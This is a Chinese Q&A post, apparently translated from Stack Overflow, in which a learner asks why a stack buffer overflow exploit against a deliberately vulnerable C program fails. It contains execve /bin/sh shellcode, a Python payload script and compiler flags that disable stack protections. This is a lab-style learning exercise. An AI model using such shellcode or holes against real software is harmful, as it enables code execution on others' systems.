0

外壳代码:https ://www.exploit-db.com/raw/42179

利用代码(python):

sh = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
retaddr = "\x7f\xff\xff\xff\x00\x50\xe6"
print(sh + ("A" * (120 - len(sh) - 4)) + retaddr)

漏洞代码(C):

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    char buffer[100];

    if (argc != 2) {
        fprintf(stderr, "Usage: %s <str>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    printf("buffer is here: %p\n", &buffer);
    strcpy(buffer, argv[1]);
    printf("copied %s into buffer\n", argv[1]);
    return 0;
}

我使用的虚拟机是:ubuntu-9.04-server-amd64 (2.6.28-11).

我如何编译易受攻击的代码:

gcc vuln.c -U_FORTIFY_SOURCE -fno-pie -fno-stack-protector -fno-omit-frame-pointer -ggdb -z execstack -o vuln

我似乎遇到的问题是我无法弄清楚如何让rip寄存器转到正确的返回地址。

输出:

...
buffer is here: 0x7fffffffe650
...
Program received signal SIGSEGV, Segmentation fault.
0x0007ffff700e650 in ?? ()

有人可以帮忙吗?

4

0 回答 0